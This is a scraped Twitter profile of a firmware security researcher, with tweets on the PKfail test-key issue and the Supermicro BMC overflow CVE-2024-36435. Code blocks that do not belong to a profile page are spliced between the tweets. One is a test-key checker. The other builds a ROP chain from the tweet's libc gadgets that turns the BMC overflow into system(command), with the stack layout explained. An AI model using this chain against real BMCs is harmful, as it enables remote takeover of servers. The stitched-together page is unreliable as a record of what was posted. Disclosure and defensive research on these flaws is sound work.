Fabio Pagani (@pagabuc)'s Twitter Profile
Fabio Pagani

@pagabuc

Research Scientist @binarly_io. Prev: Postdoc @ucsantabarbara. Binary analysis, memory forensics et al. Captures flags with Shellphish and NOPS.

ID: 326371255

Website: https://pagabuc.me/
Joined: 29-06-2011 20:20:25

1.1K Tweets

837 Followers

554 Following

Ryan Naraine (@ryanaraine):

New from BINARLY🔬: "Based on our data, we found PKfail and non-production keys on medical devices, desktops, laptops, gaming consoles, enterprise servers, ATMs, POS terminals, and some weird places like voting machines." binarly.io/blog/pkfail-tw…

Alex Matrosov (@matrosov):

More updates will be coming tomorrow at the #LABScon stage. The problems related to the test and non-production keys are much bigger than we initially thought.

SentinelOne (@sentinelone):

🔎 Must-See Talks at #LABScon 2024: Cutting-edge security research in real time:

• 🇨🇳 Eugenio Benincasa & Dakota Cary: A Walking Red Flag (With Yellow Stars)
• 🇷🇺 Dan Black & Luke Jenkins: Breaching the Battlefield: UNC4221’s Espionage for Military Advantage
• 👨‍🌾
adam shostack (@adamshostack):

Latest blog post ends "To put a spiky point on it, if using a component labeled “Do not trust,” doesn’t qualify you for liability, what does?" shostack.org/blog/secure-bo…

Alex Matrosov (@matrosov):

🚨In just a few hours at #LABScon, we’ll be unveiling a high-impact vulnerability and a critical security discovery affecting platform trust on Supermicro servers. Stay tuned and watch our REsearch blog!

BINARLY🔬 (@binarly_io):

NEW! Repeatable Failures: Test Keys Used to Sign Production Software…Again? 🔥Full details: binarly.io/blog/repeatabl…

allthingsida (@allthingsida):

Have you seen the 'sp-analysis failed' error and wondered why it appears and how to fix it? In this video, we explain the stack pointer tracing/analysis feature of IDA/its processor modules and how to fix stack pointer tracing errors. youtu.be/Cd6Q-_1dxNU Some of the topics

Alex Matrosov (@matrosov):

Non-production cryptographic keys are used widely in the industry, and some vendors have the mindset that if it’s not leaked, it’s not a problem. It’s never happened, right? Check out our new REsearch on Supermicro BMC, which shows a new vulnerability in Root of Trust validation

SentinelOne (@sentinelone):

⛓️ BINARLY🔬's Alex Matrosov and Fabio Pagani unveiled PKFAIL, a critical firmware supply-chain issue affecting hundreds of devices due to vendors shipping default test keys. #LABScon24

📄 Read more about their research in a blog post published the same day: binarly.io/blog/repeatabl…
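As an added illustration of the check behind PKfail (this is not Binarly's code or their pk.fail service), the following Python reads a Secure Boot Platform Key the way Linux efivarfs exposes it (a 32-bit attributes word followed by one or more EFI_SIGNATURE_LIST structures), walks the X.509 entries, and flags a certificate whose subject carries the "DO NOT TRUST" marker quoted above. The "DO NOT SHIP" marker is an assumed addition, the efivarfs path is the standard PK location under the EFI global variable GUID, and the two certificate bodies at the bottom are constructed stand-ins, not real keys.

```python
import struct
import uuid

# EFI_CERT_X509_GUID: signature-list entries of this type hold a DER X.509 cert.
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
# Where Linux efivarfs exposes the Platform Key (name-EFI_GLOBAL_VARIABLE GUID).
PK_EFIVAR_PATH = "/sys/firmware/efi/efivars/PK-8be4df61-93ca-11d2-aa0d-00e098032b8c"
# Subject substrings of test keys that must never ship on a production device.
# "DO NOT TRUST" is the marker quoted above; "DO NOT SHIP" is an assumed extra.
TEST_KEY_MARKERS = (b"DO NOT TRUST", b"DO NOT SHIP")


def parse_signature_lists(data):
    """Yield (signature_type, owner, signature_data) for every entry in a
    concatenation of EFI_SIGNATURE_LIST structures."""
    off = 0
    while off < len(data):
        if len(data) - off < 28:
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        sig_type = uuid.UUID(bytes_le=data[off:off + 16])
        list_size, hdr_size, sig_size = struct.unpack_from("<III", data, off + 16)
        if list_size < 28 + hdr_size or off + list_size > len(data):
            raise ValueError("inconsistent SignatureListSize")
        body = data[off + 28 + hdr_size:off + list_size]
        # Each EFI_SIGNATURE_DATA is a 16-byte SignatureOwner GUID plus the payload.
        if sig_size < 16 or len(body) % sig_size:
            raise ValueError("inconsistent SignatureSize")
        for i in range(0, len(body), sig_size):
            entry = body[i:i + sig_size]
            yield sig_type, uuid.UUID(bytes_le=entry[:16]), entry[16:]
        off += list_size


def find_test_keys(efivar_bytes):
    """Return (owner GUID, marker) pairs for X.509 PK entries that look like
    test keys. Subject strings in DER are stored as plain ASCII, so a
    case-insensitive substring match on the certificate bytes is enough here."""
    if len(efivar_bytes) < 4:
        raise ValueError("efivarfs variable too short")
    data = efivar_bytes[4:]  # skip the 32-bit attributes word efivarfs prepends
    hits = []
    for sig_type, owner, der in parse_signature_lists(data):
        if sig_type != EFI_CERT_X509_GUID:
            continue
        upper = der.upper()
        for marker in TEST_KEY_MARKERS:
            if marker in upper:
                hits.append((str(owner), marker.decode()))
    return hits


def build_efivar(cert_der, owner=uuid.UUID(int=0)):
    """Construct an efivarfs-style PK blob holding one X.509 entry (test input)."""
    entry = owner.bytes_le + cert_der
    header = EFI_CERT_X509_GUID.bytes_le + struct.pack("<III", 28 + len(entry), 0, len(entry))
    # NON_VOLATILE | BOOTSERVICE_ACCESS | RUNTIME_ACCESS | TIME_BASED_AUTHENTICATED_WRITE_ACCESS
    attrs = struct.pack("<I", 0x27)
    return attrs + header + entry


# Constructed stand-ins for certificate bodies: only the subject text matters here.
FAKE_TEST_PK = b"\x30\x82\x00\x00" + b"CN=DO NOT TRUST - AMI Test PK"
FAKE_GOOD_PK = b"\x30\x82\x00\x00" + b"CN=Example Corp Platform Key"

if __name__ == "__main__":
    with open(PK_EFIVAR_PATH, "rb") as f:
        print(find_test_keys(f.read()) or "no test-key marker found in PK")
```

Run it as root on a UEFI Linux host to check the live PK; the same parser works on a PK blob dumped from a firmware image, once the 4-byte attributes word is prepended.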
Ryan Naraine (@ryanaraine):

💔 This week's show is the full keynote day remarks from Juan Andres Guerrero-Saade at #LABScon24. In this talk, Juanito addresses the current state of threat intel, expressing a need for a difficult conversation about its direction and purpose. He discusses feelings of

BINARLY🔬 (@binarly_io):

🚨New! "CVE-2024-36435 Deep-Dive: The Year’s Most Critical BMC Security Flaw." 🔥Classic buffer overflow vulnerabilities resurface in BMCs, remotely opening the gates from the castle. 🏆Kudos to Alex Tereshkin for the initial discovery and disclosure! binarly.io/blog/cve-2024-…

Alex Matrosov (@matrosov):

💥PoC is now public!

    target = "https://{ip_address}/cgi/login.cgi"
    command = "touch /tmp/BRLY"
    libc = 0x76283000  # we try to guess
    gadget1 = 0x000D8874  # pop {r0, r1, r2, r3, fp, pc};
    gadget2 = 0x001026D4  # mov r0, sp; blx r3;
    system = 0x0003C4D4

github.com/binarly-io/Too…
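As an added illustration of how the three libc gadgets in the tweet chain together on a 32-bit little-endian ARM target (this is not Binarly's PoC, which lives in the linked repository), the Python below assembles only the return-oriented part of the payload. The layout is derived from the gadget comments: gadget1 pops r3 and pc, gadget2 passes the stack pointer to whatever r3 holds, so placing system() in r3 and the command string right after the chain turns it into system(command). The libc base is the guessed value from the tweet; the overflow offset, the HTTP request format and the target address are not in the excerpt and are left out, so this builds bytes and triggers nothing.

```python
import struct

# Values from the tweet: a guessed libc base and gadget offsets relative to it.
LIBC_BASE = 0x76283000
GADGET1 = 0x000D8874  # pop {r0, r1, r2, r3, fp, pc}
GADGET2 = 0x001026D4  # mov r0, sp; blx r3
SYSTEM = 0x0003C4D4   # system()


def p32(value):
    """Pack one 32-bit little-endian word as it sits on an AArch32 stack."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def build_rop_chain(command, libc_base=LIBC_BASE):
    """Return the bytes that replace the saved return address and what follows it.

    Stack slot by slot (4 bytes each):
      gadget1         first return address; pops the next six words
      r0, r1, r2      scratch, system() ignores them
      r3 = system     callee of the blx r3 in gadget2
      fp              scratch
      pc = gadget2    mov r0, sp; blx r3
      command\\0       sp points here when gadget2 runs, so system() gets it as arg
    """
    if isinstance(command, str):
        command = command.encode()
    chain = p32(libc_base + GADGET1)
    chain += p32(0) * 3                  # r0, r1, r2
    chain += p32(libc_base + SYSTEM)     # r3
    chain += p32(0)                      # fp
    chain += p32(libc_base + GADGET2)    # pc
    chain += command + b"\x00"           # system() reads up to the first NUL
    return chain


def chain_words(chain):
    """Decode the six address/register slots of a chain for inspection."""
    return [struct.unpack_from("<I", chain, i)[0] for i in range(0, 28, 4)]


if __name__ == "__main__":
    for word in chain_words(build_rop_chain("touch /tmp/BRLY")):
        print(f"0x{word:08x}")
```

Note that the chain words themselves contain 0x00 bytes (the libc base alone supplies one), which is consistent with the overflow not being a NUL-terminated string copy; that property is something to confirm against the actual vulnerable copy before reusing this layout elsewhere.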

Dino A. Dai Zovi (@dinodaizovi):

Good example of why your OOB management network that these BMC and IPMI interfaces are attached to is extremely security sensitive

ic3qu33n (@nikaroxanne):

Excited to share the first post in my new blog series with LeviathanSecurity: UEFI is the new BIOS This blog series dives deep into UEFI RE/xdev. This first post is your UEFI intro. Check it out, hmu with feedback/q’s ✨ leviathansecurity.com/blog/uefi-is-t…

BINARLY🔬 (@binarly_io):

🔐Update on #PKfail! Our pk.fail detection service has scanned over 10,336 unique firmware images and detected 869 impacted instances — that’s 8.4%! 

All detected unique keys are now showcased on the service👇